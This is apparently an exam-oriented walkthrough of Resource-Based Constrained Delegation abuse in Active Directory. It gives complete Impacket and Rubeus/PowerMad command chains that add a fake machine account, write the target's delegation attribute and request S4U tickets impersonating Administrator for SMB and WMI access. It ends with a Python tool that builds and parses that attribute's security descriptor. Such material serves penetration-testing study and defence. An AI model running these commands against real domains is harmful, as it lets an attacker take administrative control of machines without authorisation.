
RBCD Full Walkthrough

Resource-Based Constrained Delegation, from WriteProperty on a target computer object to S4U2Self/S4U2Proxy: impersonating almost any user (a Domain Admin included) to a service on that computer.

RBCD Concept

Resource-Based Constrained Delegation (RBCD) lets an account that has an SPN (typically a machine account) impersonate users to a target computer. Classic constrained delegation is configured on the front-end service (msDS-AllowedToDelegateTo) and needs Domain Admin rights to set; RBCD is configured on the resource instead. The target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute holds a security descriptor whose DACL lists the principals allowed to act on behalf of other identities to that computer. Anyone who can write that attribute on a computer object can therefore add a machine account they control to it and then use S4U2Self followed by S4U2Proxy to obtain service tickets to that computer as almost any user.

Requirements

  • WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity, or GenericWrite/GenericAll/WriteDacl/WriteOwner on the target computer object (BloodHound shows these as GenericWrite, AddAllowedToAct and similar edges onto the machine)
  • An account with an SPN whose credentials (password or hash) you control: normally a computer account, either one you already compromised or one you create with addcomputer if MachineAccountQuota (MAQ) > 0
  • Impacket (addcomputer, rbcd, getST) on Linux or Rubeus plus PowerMad on Windows for the S4U2Self/S4U2Proxy ticket request

Attack Chain

# Step 1: Check MachineAccountQuota (default is 10, so any domain user can add machines).
# The value lives on the domain object, not in the password policy:
Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
# Or with NetExec (nxc, the successor of CrackMapExec):
nxc ldap DC_IP -u user -p pass -M maq

# Step 2: Create a fake machine account
impacket-addcomputer corp.local/jdoe:'Password1!' \
  -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' -dc-ip 10.10.10.5

# Step 3: Configure RBCD: add FAKEMACHINE$ to TARGET$'s msDS-AllowedToActOnBehalfOfOtherIdentity
# (-action write merges with entries already present; -action read shows the current value)
impacket-rbcd corp.local/jdoe:'Password1!' \
  -delegate-from 'FAKEMACHINE$' -delegate-to 'TARGET$' \
  -action write -dc-ip 10.10.10.5

# Step 4 (optional): get a TGT for FAKEMACHINE$ so that getST can run with -k -no-pass;
# when given the password directly, getST requests its own TGT
impacket-getTGT corp.local/'FAKEMACHINE$':'FakePass123!' -dc-ip 10.10.10.5
export KRB5CCNAME='FAKEMACHINE$.ccache'

# Step 5: S4U2Self + S4U2Proxy: service ticket for cifs/TARGET as Administrator
impacket-getST corp.local/'FAKEMACHINE$':'FakePass123!' \
  -spn cifs/TARGET.corp.local -impersonate Administrator -dc-ip 10.10.10.5
# getST logs the ccache file it saved; it is named after impersonated user, SPN and realm:
export KRB5CCNAME='Administrator@cifs_TARGET.corp.local@CORP.LOCAL.ccache'

# Step 6: Use the ticket (the host name must match the SPN in the ticket, so use the FQDN)
impacket-smbclient -k -no-pass corp.local/Administrator@TARGET.corp.local
impacket-wmiexec -k -no-pass corp.local/Administrator@TARGET.corp.local

With Rubeus (Windows)

# Step 1: Add fake machine (PowerMad)
New-MachineAccount -MachineAccount FAKEMACHINE -Password (ConvertTo-SecureString 'FakePass123!' -AsPlainText -Force)

# Step 2: Get SID of FAKEMACHINE$
$sid = (Get-ADComputer FAKEMACHINE).SID.Value

# Step 3: Set msDS-AllowedToActOnBehalfOfOtherIdentity on TARGET$
# SDDL: owner BUILTIN\Administrators, one full-control allow ACE for the fake machine's SID.
# -Replace overwrites whatever was there; check the current value first if the target may
# already have legitimate delegation configured.
$sd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)"
$sdBytes = New-Object byte[] ($sd.BinaryLength)
$sd.GetBinaryForm($sdBytes, 0)
Get-ADComputer TARGET | Set-ADComputer -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$sdBytes}

# Step 4: S4U chain via Rubeus (/rc4 is the NT hash of the machine password; /aes256 works too)
.\Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<NTLM of FakePass123!> /impersonateuser:Administrator /msdsspn:cifs/TARGET.corp.local /ptt

# Step 5: Access target
dir \\TARGET.corp.local\C$

Quick Win: BloodHound shows GenericWrite, GenericAll, WriteDacl, WriteOwner and AddAllowedToAct edges to computer objects. Any such edge is a potential RBCD attack. The most common scenario: helpdesk users or groups with GenericWrite on workstations.

Exam Tips

  • If MAQ=0, use an existing account with an SPN whose credentials you already hold (a machine account whose password or hash you dumped or cracked) as the delegate-from account instead of creating a new one
  • Verify RBCD was set: Get-ADComputer TARGET -Properties msDS-AllowedToActOnBehalfOfOtherIdentity (raw bytes) or -Properties PrincipalsAllowedToDelegateToAccount (resolved names); from Linux, impacket-rbcd ... -action read
  • The -impersonate user must be a delegatable domain user: members of Protected Users and accounts flagged "Account is sensitive and cannot be delegated" fail, and impersonating krbtgt won't work
  • RBCD with Impacket requires working Kerberos name resolution and time sync: make sure /etc/hosts has DC and target entries (FQDNs matching the SPN) and your clock is within 5 minutes of the DC
  • Clean up: remove the entry (impacket-rbcd ... -action remove, or -action flush to clear the attribute) and delete the fake machine account after the exam to avoid leaving artifacts
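The attribute that every step above writes or checks is a binary, self-relative security descriptor. The following is an added example, not code from the original page and not Impacket's or Rubeus' own implementation: a dependency-free Python builder and parser for that value. It produces the same descriptor that impacket-rbcd -action write and the SDDL string in the Rubeus section produce (owner BUILTIN\Administrators, one full-control allow ACE per SID, mask 0x000F01FF), decodes a value as returned base64-encoded by ldapsearch or as raw bytes by Get-ADComputer so you can confirm which SIDs may delegate to the target, and merges a new SID into an existing descriptor instead of overwriting it. The SID used for FAKEMACHINE$ is constructed for the example and belongs to no real domain.

```python
"""Build and decode msDS-AllowedToActOnBehalfOfOtherIdentity values (added example).

Pure Python (struct/base64 only). The layout is the self-relative SECURITY_DESCRIPTOR
that Active Directory stores in the attribute: 20-byte header, owner SID, DACL.
"""
import base64
import struct

# Mask the SDDL rights string CCDCLCSWRPWPDTLOCRSDRCWDWO expands to (983551 == 0x000F01FF).
FULL_CONTROL = 0x000F01FF
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
BUILTIN_ADMINS = "S-1-5-32-544"  # "O:BA" in the SDDL form


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID: revision, sub-authority count, 48-bit big-endian
    identifier authority, then each sub-authority as a little-endian uint32."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def sid_from_bytes(data: bytes, offset: int = 0):
    """Decode a binary SID at `offset`; returns (sid_string, bytes_consumed)."""
    rev, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_sd(allowed_sids) -> bytes:
    """Self-relative SD with owner BUILTIN\\Administrators and one full-control
    ACCESS_ALLOWED ACE per SID: the value written into the target's attribute."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE: type, flags, size, access mask, trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: revision 4 (ACL_REVISION_DS), sbz1, total size, ACE count, sbz2
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    offset_owner = 20                        # header is exactly 20 bytes
    offset_dacl = offset_owner + len(owner)  # group and SACL absent, so their offsets are 0
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         offset_owner, 0, 0, offset_dacl)
    return header + owner + dacl


def parse_rbcd_sd(data: bytes):
    """Return [(sid, mask), ...] for every ACCESS_ALLOWED ACE in the DACL.
    An empty list means no principal may delegate to the resource."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", data, 0)
    if rev != 1:
        raise ValueError("unsupported security descriptor revision %d" % rev)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", data, off_dacl)
    pos = off_dacl + 8
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", data, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask = struct.unpack_from("<I", data, pos + 4)[0]
            sid, _ = sid_from_bytes(data, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size  # skip any other ACE type by its declared size
    return allowed


def encode_ldap_value(sd: bytes) -> str:
    """Base64 form, as LDAP tools print binary attributes ('attr:: <base64>')."""
    return base64.b64encode(sd).decode()


def parse_ldap_value(b64: str):
    """Decode an ldapsearch-style base64 value and list the SIDs allowed to delegate."""
    return parse_rbcd_sd(base64.b64decode(b64))


def add_delegate(existing_sd: bytes, new_sid: str) -> bytes:
    """Merge rather than overwrite: keep every SID already allowed (what
    impacket-rbcd -action write does) so legitimate delegation is not broken."""
    sids = [sid for sid, _ in parse_rbcd_sd(existing_sd)] if existing_sd else []
    if new_sid not in sids:
        sids.append(new_sid)
    return build_rbcd_sd(sids)


if __name__ == "__main__":
    fake = "S-1-5-21-1004336348-1177238915-682003330-1104"  # constructed SID for FAKEMACHINE$
    sd = build_rbcd_sd([fake])
    print("value for msDS-AllowedToActOnBehalfOfOtherIdentity (base64):")
    print(encode_ldap_value(sd))
    print("decoded back:", parse_rbcd_sd(sd))
```

parse_ldap_value covers the "verify RBCD was set" tip from Linux: ldapsearch prints the attribute base64-encoded after a double colon, and Get-ADComputer returns the same bytes as a byte array. add_delegate is the safe way to script step 3 on a target that may already have delegation configured, since the PowerShell -Replace path overwrites the whole descriptor.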